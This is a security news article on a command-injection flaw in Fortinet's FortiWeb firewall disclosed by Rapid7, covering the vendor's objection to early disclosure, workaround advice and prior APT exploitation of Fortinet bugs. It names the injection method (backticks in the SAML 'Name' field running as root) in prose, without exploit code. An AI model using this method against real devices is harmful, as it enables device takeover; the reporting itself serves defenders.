The OS command-injection bug, in the web application firewall (WAF) platform known as Forti Web, will now get a patch this week.
UPDATED – 18.00 – 18-08-2021
An as yet unpatched OS command-injection security vulnerability has been disclosed in Fortinet’s web application firewall (WAF) platform, known as Forti Web. It could allow privilege escalation & full device takeover, researchers stated.
Unknown Vulnerabilities
Forti Web is a cyber-security defence platform, aimed at protecting business-critical web applications from attacks that target known & unknown vulnerabilities. The firewall has been to keep up with the deployment of new or updated features, or the addition of new web APIs, according to Fortinet.
The bug (CVE pending) exists in Forti Web’s management interface (version 6.3.11 & prior) & carries a CVSSv3 base score of 8.7 out of 10, making it high severity. It can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page, according to Rapid7 researcher William Vu who discovered the bug.
“Note that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication-bypass issue, such as CVE-2020-29015,” according to a Tues. write-up on the issue.
Server Configuration
When attackers are authenticated to the management interface of the Forti Web device, they can smuggle commands using backticks in the “Name” field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system.
“An attacker can use this vulnerability to take complete control of the affected device, with the highest possible privileges,” according to the writeup. “They might install a persistent shell, crypto mining software, or other malicious software.”
The damage could be worse if the management interface is exposed to the internet: Rapid7 noted that attackers could move to the wider network in that case. However, Rapid7 researchers identified less than 300 appliances that seemed to be doing so.
Proof-of-Concept
In the analysis, Vu provided a proof-of-concept exploit code, which uses an HTTP POST request & response.
Because of the disclosure, Fortinet has sped up plans to release a fix for the problem with Forti Web 6.4.1 — originally planned for the end of Aug., it will now be available by the end of the week.
“We are working to deliver immediate notification of a workaround to customers & a patch released by the end of the week,” it stated.
The firm also noted that Rapid7’s disclosure was a surprise given vulnerability-disclosure norms in the industry.
Independent Security Researchers
“The security of our customers is always our 1st priority. Fortinet recognises the important role of independent security researchers who work closely with vendors to protect the cyber-security ecosystem in alignment with their responsible disclosure policies.
In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the Fortinet PSIRT Policy page, which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers.
As such, we had expected that Rapid7 hold any findings prior to the end of the 90-day Responsible disclosure window. We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window.”
Straightforward Advice
Rapid7 offered straightforward advice:
“In the absence of a patch, users are advised to disable the Forti Web device’s management interface from untrusted networks, which would include the internet,” according to Rapid7.
“Generally speaking, management interfaces for devices like Forti Web should not be exposed directly to the internet anyway — instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.”
The Rapid7 researchers explained that the vulnerability appears to be related to CVE-2021-22123, which was patched in June.
Popular for Exploit
The vendor is no stranger to cyber-security bugs in its platforms, & Fortinet’s cyber-security products are popular as exploitation avenues with cyber-attackers, including nation-state players. Users should prepare to patch quickly.
In April, the FBI & the US Cyber-security & Infrastructure Security Agency (CISA) warned that various advanced persistent threats (APTs) were actively exploiting 3 security vulnerabilities in the Fortinet SSL VPN for espionage.
Gain a Foothold
Exploits for CVE-2018-13379, CVE-2019-5591 & CVE-2020-12812 were being used for to gain a foothold within networks before moving laterally & carrying out recon, they warned.
One of those bugs, a Fortinet vulnerability in Forti OS, was also seen being used to deliver a new ransomware strain, dubbed Cring, that is targeting industrial enterprises across Europe.
https://www.cybernewsgroup.co.uk/virtual-conference-september-2021/